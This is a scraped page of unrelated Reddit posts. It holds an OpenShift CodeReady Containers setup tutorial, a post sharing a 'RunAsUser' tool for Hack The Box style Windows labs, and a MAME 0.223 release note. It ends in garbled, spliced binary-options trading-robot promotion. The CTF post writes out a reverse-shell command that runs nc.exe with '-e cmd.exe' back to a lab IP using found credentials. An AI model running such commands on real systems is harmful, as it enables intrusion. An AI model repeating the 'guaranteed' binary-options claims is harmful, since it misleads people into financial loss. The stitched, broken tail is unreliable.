https://ubuntu.com/tutorials/command-line-for-beginners#2-a-brief-history-lesson https://www.guru99.com/linux-commands-cheat-sheet.html
http://cc.iiti.ac.in/docs/linuxcommands.pdf
Aside from the required knowledge there are also some things that can be helpful to know just to make the use of OpenShift a bit simpler. This consists of some general knowledge on PaaS like Dockers and Kubernetes.
Docker https://www.docker.com/
Kubernetes https://kubernetes.io/

System requirements

Minimum System requirements

The minimum system requirements for the Red Hat OpenShift CodeReady Containers has the following minimum hardware:
Hardware requirements
Code Ready Containers requires the following system resources:
● 4 virtual CPU’s
● 9 GB of free random-access memory
● 35 GB of storage space
● Physical CPU with Hyper-V (intel) or SVM mode (AMD) this has to be enabled in the bios
Software requirements
The minimum system requirements for the Red Hat OpenShift CodeReady Containers has the following minimum operating system requirements:
Microsoft Windows
On Microsoft Windows, the Red Hat OpenShift CodeReady Containers requires the Windows 10 Pro Fall Creators Update (version 1709) or newer. CodeReady Containers does not work on earlier versions or other editions of Microsoft Windows. Microsoft Windows 10 Home Edition is not supported.
macOS
On macOS, the Red Hat OpenShift CodeReady Containers requires macOS 10.12 Sierra or newer.
Linux
On Linux, the Red Hat OpenShift CodeReady Containers is only supported on Red Hat Enterprise Linux/CentOS 7.5 or newer and on the latest two stable Fedora releases.
When using Red Hat Enterprise Linux, the machine running CodeReady Containers must be registered with the Red Hat Customer Portal.
Ubuntu 18.04 LTS or newer and Debian 10 or newer are not officially supported and may require manual set up of the host machine.

Required additional software packages for Linux

The CodeReady Containers on Linux require the libvirt and Network Manager packages to run. Consult the following table to find the command used to install these packages for your Linux distribution:
Table 1.1 Package installation commands by distribution
Linux Distribution Installation command
Fedora Sudo dnf install NetworkManager
Red Hat Enterprise Linux/CentOS Su -c 'yum install NetworkManager'
Debian/Ubuntu Sudo apt install qemu-kvm libvirt-daemonlibvirt-daemon-system network-manage

Installation

Getting started with the installation

To install CodeReady Containers a few steps must be undertaken. Because an OpenShift account is necessary to use the application this will be the first step. An account can be made on “https://www.openshift.com/”, where you need to press login and after that select the option “Create one now”
After making an account the next step is to download the latest release of CodeReady Containers and the pulled secret on “https://cloud.redhat.com/openshift/install/crc/installer-provisioned”. Make sure to download the version corresponding to your platform and/or operating system. After downloading the right version, the contents have to be extracted from the archive to a location in your $PATH. The pulled secret should be saved because it is needed later.
The command line interface has to be opened before we can continue with the installation. For windows we will use PowerShell. All the commands we use during the installation procedure of this guide are going to be done in this command line interface unless stated otherwise. To be able to run the commands within the command line interface, use the command line interface to go to the location in your $PATH where you extracted the CodeReady zip.
If you have installed an outdated version and you wish to update, then you can delete the existing CodeReady Containers virtual machine with the $crc delete command. After deleting the container, you must replace the old crc binary with a newly downloaded binary of the latest release.
C:\Users\[username]\$PATH>crc delete 
When you have done the previous steps please confirm that the correct and up to date crc binary is in use by checking it with the $crc version command, this should provide you with the version that is currently installed.
C:\Users\[username]\$PATH>crc version 
To set up the host operating system for the CodeReady Containers virtual machine you have to run the $crc setup command. After running crc setup, crc start will create a minimal OpenShift 4 cluster in the folder where the executable is located.
C:\Users\[username]>crc setup 

Setting up CodeReady Containers

Now we need to set up the new CodeReady Containers release with the $crc setup command. This command will perform the operations necessary to run the CodeReady Containers and create the ~/.crc directory if it did not previously exist. In the process you have to supply your pulled secret, once this process is completed you have to reboot your system. When the system has restarted you can start the new CodeReady Containers virtual machine with the $crc start command. The $crc start command starts the CodeReady virtual machine and OpenShift cluster.
You cannot change the configuration of an existing CodeReady Containers virtual machine. So if you have a CodeReady Containers virtual machine and you want to make configuration changes you need to delete the virtual machine with the $crc delete command and create a new virtual machine and start that one with the configuration changes. Take note that deleting the virtual machine will also delete the data stored in the CodeReady Containers. So, to prevent data loss we recommend you save the data you wish to keep. Also keep in mind that it is not necessary to change the default configuration to start OpenShift.
C:\Users\[username]\$PATH>crc setup 
Before starting the machine, you need to keep in mind that it is not possible to make any changes to the virtual machine. For this tutorial however it is not necessary to change the configuration, if you don’t want to make any changes please continue by starting the machine with the crc start command.
C:\Users\[username]\$PATH>crc start 
\ it is possible that you will get a Nameserver error later on, if this is the case please start it with* crc start -n 1.1.1.1

Configuration

It is not is not necessary to change the default configuration and continue with this tutorial, this chapter is here for those that wish to do so and know what they are doing. However, for MacOS and Linux it is necessary to change the dns settings.

Configuring the CodeReady Containers

To start the configuration of the CodeReady Containers use the command crc config. This command allows you to configure the crc binary and the CodeReady virtual machine. The command has some requirements before it’s able to configure. This requirement is a subcommand, the available subcommands for this binary and virtual machine are:
get, this command allows you to see the values of a configurable property
set/unset, this command can be used for 2 things. To display the names of, or to set and/or unset values of several options and parameters. These parameters being:
○ Shell options
○ Shell attributes
○ Positional parameters
view, this command starts the configuration in read-only mode.
These commands need to operate on named configurable properties. To list all the available properties, you can run the command $crc config --help.
Throughout this manual we will use the $crc config command a few times to change some properties needed for the configuration.
There is also the possibility to use the crc config command to configure the behavior of the checks that’s done by the $crc start end $crc setup commands. By default, the startup checks will stop with the process if their conditions are not met. To bypass this potential issue, you can set the value of a property that starts with skip-check or warn-check to true to skip the check or warning instead of ending up with an error.
C:\Users\[username]\$PATH>crc config get C:\Users\[username]\$PATH>crc config set C:\Users\[username]\$PATH>crc config unset C:\Users\[username]\$PATH>crc config view C:\Users\[username]\$PATH>crc config --help 

Configuring the Virtual Machine

You can use the CPUs and memory properties to configure the default number of vCPU’s and amount of memory available for the virtual machine.
To increase the number of vCPU’s available to the virtual machine use the $crc config set CPUs . Keep in mind that the default number for the CPU’s is 4 and the number of vCPU’s you wish to assign must be equal or greater than the default value.
To increase the memory available to the virtual machine, use the $crc config set memory . Keep in mind that the default number for the memory is 9216 Mebibytes and the amount of memory you wish to assign must be equal or greater than the default value.
C:\Users\[username]\$PATH>crc config set CPUs  C:\Users\[username]\$PATH>crc config set memory > 

Configuring the DNS

Window / General DNS setup

There are two domain names used by the OpenShift cluster that are managed by the CodeReady Containers, these are:
crc.testing, this is the domain for the core OpenShift services.
apps-crc.testing, this is the domain used for accessing OpenShift applications that are deployed on the cluster.
Configuring the DNS settings in Windows is done by executing the crc setup. This command automatically adjusts the DNS configuration on the system. When executing crc start additional checks to verify the configuration will be executed.

macOS DNS setup

MacOS expects the following DNS configuration for the CodeReady Containers
● The CodeReady Containers creates a file that instructs the macOS to forward all DNS requests for the testing domain to the CodeReady Containers virtual machine. This file is created at /etc/resolvetesting.
● The oc binary requires the following CodeReady Containers entry to function properly, api.crc.testing adds an entry to /etc/hosts pointing at the VM IPaddress.

Linux DNS setup

CodeReady containers expect a slightly different DNS configuration. CodeReady Container expects the NetworkManager to manage networking. On Linux the NetworkManager uses dnsmasq through a configuration file, namely /etc/NetworkManageconf.d/crc-nm-dnsmasq.conf.
To set it up properly the dnsmasq instance has to forward the requests for crc.testing and apps-crc.testing domains to “192.168.130.11”. In the /etc/NetworkManageconf.d/crc-nm-dnsmasq.conf this will look like the following:
● Server=/crc. Testing/192.168.130.11
● Server=/apps-crc. Testing/192.168.130.11

Accessing the Openshift Cluster

Accessing the Openshift web console

To gain access to the OpenShift cluster running in the CodeReady virtual machine you need to make sure that the virtual machine is running before continuing with this chapter. The OpenShift clusters can be accessed through the OpenShift web console or the client binary(oc).
First you need to execute the $crc console command, this command will open your web browser and direct a tab to the web console. After that, you need to select the htpasswd_provider option in the OpenShift web console and log in as a developer user with the output provided by the crc start command.
It is also possible to view the password for kubeadmin and developer users by running the $crc console --credentials command. While you can access the cluster through the kubeadmin and developer users, it should be noted that the kubeadmin user should only be used for administrative tasks such as user management and the developer user for creating projects or OpenShift applications and the deployment of these applications.
C:\Users\[username]\$PATH>crc console C:\Users\[username]\$PATH>crc console --credentials 

Accessing the OpenShift cluster with oc

To gain access to the OpenShift cluster with the use of the oc command you need to complete several steps.
Step 1.
Execute the $crc oc-env command to print the command needed to add the cached oc binary to your PATH:
C:\Users\[username]\$PATH>crc oc-env 
Step 2.
Execute the printed command. The output will look something like the following:
PS C:\Users\OpenShift> crc oc-env $Env:PATH = "CC:\Users\OpenShift\.crc\bin\oc;$Env:PATH" # Run this command to configure your shell: # & crc oc-env | Invoke-Expression 
This means we have to execute* the command that the output gives us, in this case that is:
C:\Users\[username]\$PATH>crc oc-env | Invoke-Expression 
\this has to be executed every time you start; a solution is to move the oc binary to the same path as the crc binary*
To test if this step went correctly execute the following command, if it returns without errors oc is set up properly
C:\Users\[username]\$PATH>.\oc 
Step 3
Now you need to login as a developer user, this can be done using the following command:
$oc login -u developer https://api.crc.testing:6443
Keep in mind that the $crc start will provide you with the password that is needed to login with the developer user.
C:\Users\[username]\$PATH>oc login -u developer https://api.crc.testing:6443 
Step 4
The oc can now be used to interact with your OpenShift cluster. If you for instance want to verify if the OpenShift cluster Operators are available, you can execute the command
$oc get co 
Keep in mind that by default the CodeReady Containers disables the functions provided by the commands $machine-config and $monitoringOperators.
C:\Users\[username]\$PATH>oc get co 

Demonstration

Now that you are able to access the cluster, we will take you on a tour through some of the possibilities within OpenShift Container Platform.
We will start by creating a project. Within this project we will import an image, and with this image we are going to build an application. After building the application we will explain how upscaling and downscaling can be used within the created application.
As the next step we will show the user how to make changes in the network route. We also show how monitoring can be used within the platform, however within the current version of CodeReady Containers this has been disabled.
Lastly, we will show the user how to use user management within the platform.

Creating a project

To be able to create a project within the console you have to login on the cluster. If you have not yet done this, this can be done by running the command crc console in the command line and logging in with the login data from before.
When you are logged in as admin, switch to Developer. If you're logged in as a developer, you don't have to switch. Switching between users can be done with the dropdown menu top left.
Now that you are properly logged in press the dropdown menu shown in the image below, from there click on create a project.
https://preview.redd.it/ytax8qocitv51.png?width=658&format=png&auto=webp&s=72d143733f545cf8731a3cca7cafa58c6507ace2
When you press the correct button, the following image will pop up. Here you can give your project a name and description. We chose to name it CodeReady with a displayname CodeReady Container.
https://preview.redd.it/vtaxadwditv51.png?width=594&format=png&auto=webp&s=e3b004bab39fb3b732d96198ed55fdd99259f210

Importing image

The Containers in OpenShift Container Platform are based on OCI or Docker formatted images. An image is a binary that contains everything needed to run a container as well as the metadata of the requirements needed for the container.
Within the OpenShift Container Platform it’s possible to obtain images in a number of ways. There is an integrated Docker registry that offers the possibility to download new images “on the fly”. In addition, OpenShift Container Platform can use third party registries such as:
- Https://hub.docker.com/
- Https://catalog.redhat.com/software/containers/search
Within this manual we are going to import an image from the Red Hat container catalog. In this example we’ll be using MediaWiki.
Search for the application in https://catalog.redhat.com/software/containers/search

https://preview.redd.it/c4mrbs0fitv51.png?width=672&format=png&auto=webp&s=f708f0542b53a9abf779be2d91d89cf09e9d2895
Navigate to “Get this image”
Follow the steps to “create a registry service account”, after that you can copy the YAML.
https://preview.redd.it/b4rrklqfitv51.png?width=1323&format=png&auto=webp&s=7a2eb14a3a1ba273b166e03e1410f06fd9ee1968
After the YAML has been copied we will go to the topology view and click on the YAML button
https://preview.redd.it/k3qzu8dgitv51.png?width=869&format=png&auto=webp&s=b1fefec67703d0a905b00765f0047fe7c6c0735b
Then we have to paste in the YAML, put in the name, namespace and your pull secret name (which you created through your registry account) and click on create.
https://preview.redd.it/iz48kltgitv51.png?width=781&format=png&auto=webp&s=4effc12e07bd294f64a326928804d9a931e4d2bd
Run the import command within powershell
$oc import-image openshift4/mediawiki --from=registry.redhat.io/openshift4/mediawiki --confirm imagestream.image.openshift.io/mediawiki imported 

Creating and managing an application

There are a few ways to create and manage applications. Within this demonstration we’ll show how to create an application from the previously imported image.

Creating the application

To create an image with the previously imported image go back to the console and topology. From here on select container image.
https://preview.redd.it/6506ea4iitv51.png?width=869&format=png&auto=webp&s=c0231d70bb16c76cd131e6b71256e93550cc8b37
For the option image you'll want to select the “image stream tag from internal registry” option. Give the application a name and then create the deployment.
https://preview.redd.it/tk72idniitv51.png?width=813&format=png&auto=webp&s=a4e662cf7b96604d84df9d04ab9b90b5436c803c
If everything went right during the creating process you should see the following, this means that the application is successfully running.
https://preview.redd.it/ovv9l85jitv51.png?width=901&format=png&auto=webp&s=f78f350207add0b8a979b6da931ff29ffa30128c

Scaling the application

In OpenShift there is a feature called autoscaling. There are two types of application scaling, namely vertical scaling, and horizontal scaling. Vertical scaling is adding only more CPU and hard disk and is no longer supported by OpenShift. Horizontal scaling is increasing the number of machines.
One of the ways to scale an application is by increasing the number of pods. This can be done by going to a pod within the view as seen in the previous step. By either pressing the up or down arrow more pods of the same application can be added. This is similar to horizontal scaling and can result in better performance when there are a lot of active users at the same time.
https://preview.redd.it/s6i1vbcrltv51.png?width=602&format=png&auto=webp&s=e62cbeeed116ba8c55704d61a990fc0d8f3cfaa1
In the picture above we see the number of nodes and pods and how many resources those nodes and pods are using. This is something to keep in mind if you want to scale up your application, the more you scale it up, the more resources it will take up.

https://preview.redd.it/quh037wmitv51.png?width=194&format=png&auto=webp&s=5e326647b223f3918c259b1602afa1b5fbbeea94

Network

Since OpenShift Container platform is built on Kubernetes it might be interesting to know some theory about its networking. Kubernetes, on which the OpenShift Container platform is built, ensures that the Pods within OpenShift can communicate with each other via the network and assigns them their own IP address. This makes all containers within the Pod behave as if they were on the same host. By giving each pod its own IP address, pods can be treated as physical hosts or virtual machines in terms of port mapping, networking, naming, service discovery, load balancing, application configuration and migration. To run multiple services such as front-end and back-end services, OpenShift Container Platform has a built-in DNS.
One of the changes that can be made to the networking of a Pod is the Route. We’ll show you how this can be done in this demonstration.
The Route is not the only thing that can be changed and or configured. Two other options that might be interesting but will not be demonstrated in this manual are:
- Ingress controller, Within OpenShift it is possible to set your own certificate. A user must have a certificate / key pair in PEM-encoded files, with the certificate signed by a trusted authority.
- Network policies, by default all pods in a project are accessible from other pods and network locations. To isolate one or more pods in a project, it is possible to create Network Policy objects in that project to indicate the allowed incoming connections. Project administrators can create and delete Network Policy objects within their own project.
There is a search function within the Container Platform. We’ll use this to search for the network routes and show how to add a new route.
https://preview.redd.it/8jkyhk8pitv51.png?width=769&format=png&auto=webp&s=9a8762df5bbae3d8a7c92db96b8cb70605a3d6da
You can add items that you use a lot to the navigation
https://preview.redd.it/t32sownqitv51.png?width=1598&format=png&auto=webp&s=6aab6f17bc9f871c591173493722eeae585a9232
For this example, we will add Routes to navigation.
https://preview.redd.it/pm3j7ljritv51.png?width=291&format=png&auto=webp&s=bc6fbda061afdd0780bbc72555d809b84a130b5b
Now that we’ve added Routes to the navigation, we can start the creation of the Route by clicking on “Create route”.
https://preview.redd.it/5lgecq0titv51.png?width=1603&format=png&auto=webp&s=d548789daaa6a8c7312a419393795b52da0e9f75
Fill in the name, select the service and the target port from the drop-down menu and click on Create.
https://preview.redd.it/qczgjc2uitv51.png?width=778&format=png&auto=webp&s=563f73f0dc548e3b5b2319ca97339e8f7b06c9d6
As you can see, we’ve successfully added the new route to our application.
https://preview.redd.it/gxfanp2vitv51.png?width=1588&format=png&auto=webp&s=1aae813d7ad0025f91013d884fcf62c5e7d109f1
Storage
OpenShift makes use of Persistent Storage, this type of storage uses persistent volume claims(PVC). PVC’s allow the developer to make persistent volumes without needing any knowledge about the underlying infrastructure.
Within this storage there are a few configuration options:
It is however important to know how to manually reclaim the persistent volumes, since if you delete PV the associated data will not be automatically deleted with it and therefore you cannot reassign the storage to another PV yet.
To manually reclaim the PV, you need to follow the following steps:
Step 1: Delete the PV, this can be done by executing the following command
$oc delete  
Step 2: Now you need to clean up the data on the associated storage asset
Step 3: Now you can delete the associated storage asset or if you with to reuse the same storage asset you can now create a PV with the storage asset definition.
It is also possible to directly change the reclaim policy within OpenShift, to do this you would need to follow the following steps:
Step 1: Get a list of the PVs in your cluster
$oc get pv 
This will give you a list of all the PV’s in your cluster and will display their following attributes: Name, Capacity, Accesmodes, Reclaimpolicy, Statusclaim, Storageclass, Reason and Age.
Step 2: Now choose the PV you wish to change and execute one of the following command’s, depending on your preferred policy:
$oc patch pv  -p '{"spec":{"persistentVolumeReclaimPolicy":"Retain"}}' 
In this example the reclaim policy will be changed to Retain.
$oc patch pv  -p '{"spec":{"persistentVolumeReclaimPolicy":"Recycle"}}' 
In this example the reclaim policy will be changed to Recycle.
$oc patch pv  -p '{"spec":{"persistentVolumeReclaimPolicy":"Delete"}}' 
In this example the reclaim policy will be changed to Delete.

Step 3: After this you can check the PV to verify the change by executing this command again:
$oc get pv 

Monitoring

Within Red Hat OpenShift there is the possibility to monitor the data that has been created by your containers, applications, and pods. To do so, click on the menu option in the top left corner. Check if you are logged in as Developer and click on “Monitoring”. Normally this function is not activated within the CodeReady containers, because it uses a lot of resources (Ram and CPU) to run.
https://preview.redd.it/an0wvn6zitv51.png?width=228&format=png&auto=webp&s=51abf8cc31bd763deb457d49514f99ee81d610ec
Once you have activated “Monitoring” you can change the “Time Range” and “Refresh Interval” in the top right corner of your screen. This will change the monitoring data on your screen.
https://preview.redd.it/e0yvzsh1jtv51.png?width=493&format=png&auto=webp&s=b2c563635cfa60ea7ce2f9c146aa994df6aa1c34
Within this function you can also monitor “Events”. These events are records of important information and are useful for monitoring and troubleshooting within the OpenShift Container Platform.
https://preview.redd.it/l90vkmp3jtv51.png?width=602&format=png&auto=webp&s=4e97f14bedaec7ededcdcda96e7823f77ced24c2

User management

According to the documentation of OpenShift is a user, an entity that interacts with the OpenShift Container Platform API. These can be a developer for developing applications or an administrator for managing the cluster. Users can be assigned to groups, which set the permissions applied to all the group’s members. For example, you can give API access to a group, which gives all members of the group API access.
There are multiple ways to create a user depending on the configured identity provider. The DenyAll identity provider is the default within OpenShift Container Platform. This default denies access for all the usernames and passwords.
First, we’re going to create a new user, the way this is done depends on the identity provider, this depends on the mapping method used as part of the identity provider configuration.
for more information on what mapping methods are and how they function:
https://docs.openshift.com/enterprise/3.1/install_config/configuring_authentication.html
With the default mapping method, the steps will be as following
$oc create user  
Next up, we’ll create an OpenShift Container Platform Identity. Use the name of the identity provider and the name that uniquely represents this identity in the scope of the identity provider:
$oc create identity : 
The is the name of the identity provider in the master configuration. For example, the following commands create an Identity with identity provider ldap_provider and the identity provider username mediawiki_s.
$oc create identity ldap_provider:mediawiki_s 
Create a useidentity mapping for the created user and identity:
$oc create useridentitymapping :  
For example, the following command maps the identity to the user:
$oc create useridentitymapping ldap_provider:mediawiki_s mediawiki 
Now were going to assign a role to this new user, this can be done by executing the following command:
$oc create clusterrolebinding  \ --clusterrole= --user= 
There is a --clusterrole option that can be used to give the user a specific role, like a cluster user with admin privileges. The cluster admin has access to all files and is able to manage the access level of other users.
Below is an example of the admin clusterrole command:
$oc create clusterrolebinding registry-controller \ --clusterrole=cluster-admin --user=admin 

What did you achieve?

If you followed all the steps within this manual you now should have a functioning Mediawiki Application running on your own CodeReady Containers. During the installation of this application on CodeReady Containers you have learned how to do the following things:
● Installing the CodeReady Containers
● Updating OpenShift
● Configuring a CodeReady Container
● Configuring the DNS
● Accessing the OpenShift cluster
● Deploying an application
● Creating new users
With these skills you’ll be able to set up your own Container Platform environment and host applications of your choosing.

Troubleshooting

Nameserver
There is the possibility that your CodeReady container can't connect to the internet due to a Nameserver error. When this is encountered a working fix for us was to stop the machine and then start the CRC machine with the following command:
C:\Users\[username]\$PATH>crc start -n 1.1.1.1 
Hyper-V admin
Should you run into a problem with Hyper-V it might be because your user is not an admin and therefore can’t access the Hyper-V admin user group.
  1. Click Start > Control Panel > Administration Tools > Computer Management. The Computer Management window opens.
  2. Click System Tools > Local Users and Groups > Groups. The list of groups opens.
  3. Double-click the Hyper-V Administrators group. The Hyper-V Administrators Properties window opens.
  4. Click Add. The Select Users or Groups window opens.
  5. In the Enter the object names to select field, enter the user account name to whom you want to assign permissions, and then click OK.
  6. Click Apply, and then click OK.

Terms and definitions

These terms and definitions will be expanded upon, below you can see an example of how this is going to look like together with a few terms that will require definitions.
Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications. Openshift is based on Kubernetes.
Clusters are a collection of multiple nodes which communicate with each other to perform a set of operations.
Containers are the basic units of OpenShift applications. These container technologies are lightweight mechanisms for isolating running processes so that they are limited to interacting with only their designated resources.
CodeReady Container is a minimal, preconfigured cluster that is used for development and testing purposes.
CodeReady Workspaces uses Kubernetes and containers to provide any member of the development or IT team with a consistent, secure, and zero-configuration development environment.

Sources

  1. https://www.ibm.com/support/knowledgecenteen/SSMKFH/com.ibm.apmaas.doc/install/hyperv_config_add_nonadmin_user_hyperv_usergroup.html
  2. https://access.redhat.com/documentation/en-us/openshift_container_platform/4.5/
  3. https://docs.openshift.com/container-platform/3.11/admin_guide/manage_users.html
submitted by Groep6HHS to openshift [link] [comments]

RunAsUser - Windows CTF Tool

RunAsUser - Windows CTF Tool
Hi All,
First I want to thank this community as it has been an absolute goldmine for help along the way.
So what is this post about?
Along my journey I have developed a number of tools and scripts that I find to be helpful in certain scenarios. I am a strong believer in knowledge sharing and would like to give back to the community. If this tool just helps one person then I will be happy.
What is the tool?
I have come across a number of boxes now (Windows) where you may find credentials after obtaining your initial shell. The purpose is to usually reuse these credentials in some way to either pivot or escalate.
Unlike Linux, there is not a simple "su" command to just switch to the new user.
This is a simple tool to allow you to reuse those credentials and execute programs as the other user. So for example, if you have nc.exe or an msfvenom shell executable on the Windows machine and happen to find some credentials during your enumeration, then you can execute those files in the context of the new user.
Where can this be used?
Most recently I have used this on HTB (Chatterbox & JSON). At some point I may release a walkthrough to demonstrate RunAsUser being used on these boxes.
After you obtain the credentials on the JSON box you can simply run RunAsUser.exe like this:
runasuser.exe -u superadmin -p funnyhtb -f c:\Users\Public\nc.exe -a '10.10.14.12 9001 -e cmd.exe' 

  • -u = username
  • -p = password
  • -f = file to execute
  • -a = arguments (optional)
Alternatively, you do not need to supply the command line arguments like above. You may enter them in a step by step approach.

https://preview.redd.it/08xvsjntvuw51.png?width=567&format=png&auto=webp&s=9e929d6d34eff036259285b284031ff2a509f271
Are there other ways of doing this?
In PowerShell you can achieve this by creating a credential object and passing the object when starting the process. However, you may experience on some boxes that you have limited or no PowerShell capability without it crashing your shell. There are other ways to achieve this in a cmd shell but I have had hit and miss success with that in my experience.
Now there will likely be other ways of pivoting or escalating and reusing those credentials but this can sometimes be a more direct path.
Notes about tool
This isn't an everyday tool, but it can certainly help you out on restrictive boxes that you are on when you identify credentials.
I will likely update the tool in due course to include some better error handling and validation etc, but for now, it does what is required. I made this tool to help me out for this exact purpose and thought it may help others as well.
The advisory
I will always add an advisory to any tool or script I post.
Advisory All the binaries/scripts/code of RunAsUser should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Finally
As I said previously, I hope this tool can help someone and I shall be posting more tools and scripts in the near future when I find the time.
Stay safe all :-)
https://github.com/atthacks/RunAsUser

************Edit************
As mentioned in the first comment, it is possible to use runas to execute a program in the context of another user. But as I have put in the description, I have not always been successful in getting this to work and from what I understand it could be a few reasons.
Anyway, I have uploaded a GIF to the GitHub page (https://github.com/atthacks/RunAsUser) for you to see what happens when I try to use "runas" on ChatterBox and ultimately what happens when I run "RunAsUser". When you run "runas", it completely steps over the step of allowing you to type a password. ChatterBox is not the only machine I have experienced this on.
This tool is not the only solution to do this task and there are other ways of achieving the same outcome, such as PsExec. However, it is a quick tool that I enjoyed making and hopefully someone may find it helpful.

submitted by atthacks to oscp [link] [comments]

MAME 0.223

MAME 0.223

MAME 0.223 has finally arrived, and what a release it is – there’s definitely something for everyone! Starting with some of the more esoteric additions, Linus Åkesson’s AVR-based hardware chiptune project and Power Ninja Action Challenge demos are now supported. These demos use minimal hardware to generate sound and/or video, relying on precise CPU timings to work. With this release, every hand-held LCD game from Nintendo’s Game & Watch and related lines is supported in MAME, with Donkey Kong Hockey bringing up the rear. Also of note is the Bassmate Computer fishing aid, made by Nintendo and marketed by Telko and other companies, which is clearly based on the dual-screen Game & Watch design. The steady stream of TV games hasn’t stopped, with a number of French releases from Conny/VideoJet among this month’s batch.
For the first time ever, games running on the Barcrest MPU4 video system are emulated well enough to be playable. Titles that are now working include several games based on the popular British TV game show The Crystal Maze, Adders and Ladders, The Mating Game, and Prize Tetris. In a clear win for MAME’s modular architecture, the breakthrough came through the discovery of a significant flaw in our Motorola MC6840 Programmable Timer Module emulation that was causing issues for the Fairlight CMI IIx synthesiser. In the same manner, the Busicom 141-PF desk calculator is now working, thanks to improvements made to Intel 4004 CPU emulation that came out of emulating the INTELLEC 4 development system and the prototype 4004-based controller board for Flicker pinball. The Busicom 141-PF is historically significant, being the first application of Intel’s first microprocessor.
Fans of classic vector arcade games are in for a treat this month. Former project coordinator Aaron Giles has contributed netlist-based sound emulation for thirteen Cinematronics vector games: Space War, Barrier, Star Hawk, Speed Freak, Star Castle, War of the Worlds, Sundance, Tail Gunner, Rip Off, Armor Attack, Warrior, Solar Quest and Boxing Bugs. This resolves long-standing issues with the previous simulation based on playing recorded samples. Colin Howell has also refined the sound emulation for Midway’s 280-ZZZAP and Gun Fight.
V.Smile joystick inputs are now working for all dumped cartridges, and with fixes for ROM bank selection the V.Smile Motion software is also usable. The accelerometer-based V.Smile Motion controller is not emulated, but the software can all be used with the standard V.Smile joystick controller. Another pair of systems with inputs that now work is the original Macintosh (128K/512K/512Ke) and Macintosh Plus. These systems’ keyboards are now fully emulated, including the separate numeric keypad available for the original Macintosh, the Macintosh Plus keyboard with integrated numeric keypad, and a few European ISO layout keyboards for the original Macintosh. There are still some emulation issues, but you can play Beyond Dark Castle with MAME’s Macintosh Plus emulation again.
In other home computer emulation news, MAME’s SAM Coupé driver now supports a number of peripherals that connect to the rear expansion port, a software list containing IRIX hard disk installations for SGI MIPS workstations has been added, and tape loading now works for the Specialist system (a DIY computer designed in the USSR).
Of course, there’s far more to enjoy, and you can read all about it in the whatsnew.txt file, or get the source and 64-bit Windows binary packages from the download page. (For brevity, promoted V.Smile software list entries and new Barcrest MPU4 clones made up from existing dumps have been omitted here.)

MAME Testers Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Merged pull requests

submitted by cuavas to emulation [link] [comments]

Binary Options in the U.S in 2020! - YouTube Binary options Free strategy that works - from 100 to ... Binary Money Maker Software Review - Binary Options ... Spider Indicator for Binary option  free download - YouTube Binary Options Strategy 2020  100% WIN GUARANTEED ... Guide ║ binary option software that works - YouTube Binary Options Strategy That Works: Best Binary Options Strategy 2020 Binary Trading Hack Software Review - Binary Options Trading Software That Works Binary Options Robot - Automated Binary Options Trading ... Binary Predictor Software Review - Binary Options Trading Software That Works

Haftungsausschluss binäre Option Roboter-Software-Überprüfung. BinaryRobot ist ein kostenloses System, das bedeutet, es ist keine Anmeldegebühr optionen. BinaryRobot hat sich seit seiner Markteinführung Anfang des Jahres durch software rechtzeitigen Rückmeldungen auf Anfragen als binäre und engagiert bewiesen. Vorteile unseres Roboters für Binäre Optionen. Sie können Ihre eigenen ... How Option Robot works. The software makes deals automatically, but it doesn’t decide what those deals should be – you do that. You set all the parameters so that Option Robot knows when it should make a deal, how big the deal should be, what limits to set, and every other option you can specify with that broker. Your chosen broker probably offers trades on a wide range of indices, but ... Access free binary options signals with a consistent 72%+ success rate and join over 20,000 members currently profiting from binary options. Get the signals needed to supplement your binary options trading strategy. No software required! Binary Options Signals are provided to traders to notify them when a new trading opportunity is available. My signals are extremely easy to follow and only ... The software works based on a sophisticated trading algorithm. So, these sorts of services enable traders to control the portfolio trade by themselves. A trustworthy binary options robot performs the activities of most basic to advanced things. Mainly, the algorithm allows an auto trading bot to compare trading data with previous years data along with current market analysis. Likewise, a ... Despite being a new binary option trading system, OptionRobot has already caught the attention of many binary options traders who have been quick to recognize this potentially lucrative piece of software with its highly customizable service. We look forward to monitoring this exciting new robot’s win-rates in the coming months and highly recommend that traders check it out as it offers a ... This Binary Option Auto Trading software is popular among traders in terms of the highest scam activities. This trading bot makes money by following two methods. Furthermore, this Binary Option Auto Trading bot makes money when traders lose their trade. Every time after placing a trade with Binary Option Auto Trading bot, you end up with zero ... The Binary Options Software is available for any device. Nowadays it is especially important for the private trader to have a flexible trading platform. This means that the platform should also be usable from the road. With the IQ Option Software, you can access your portfolio at any time, 24/7 a week. Download the app for your mobile device. The advantage is that you only need one access to ... Most of these software’s also provide the option to send signals to your email as well. Signals; This type of binary options product is generally simpler than the software approach. You will receive emails either in a members area or in your email inbox. In the emails you will have signals that will tell you whether to put or call. Auto Trading Software; This type of binary options product I ... This software works with Meta Trader 4, so in order to use it you have to download and sign up for a MT4 demo (100% Free!). Step 1. Download Metatrader 4. Step 2. Trade Assistant – Trend Detector – Booster. These Trade Assistants will work with every top rated software on Binary Today. You can choose the Trade Assistant that works for the expiry time of your choice, or the original Trade ... We have tried, tested and reviewed the many types of software and know which companies offer the best binary robots trading experience and which software outshines the others. We believe that investing apps are a great way to save time and make money and to assist you in the quest to become the best binary options robot trader, our advice and recommendations are designed to make this happen.

[index] [11725] [16329] [12962] [18135] [12450] [29305] [22665] [23812] [1950] [12591]

Binary Options in the U.S in 2020! - YouTube

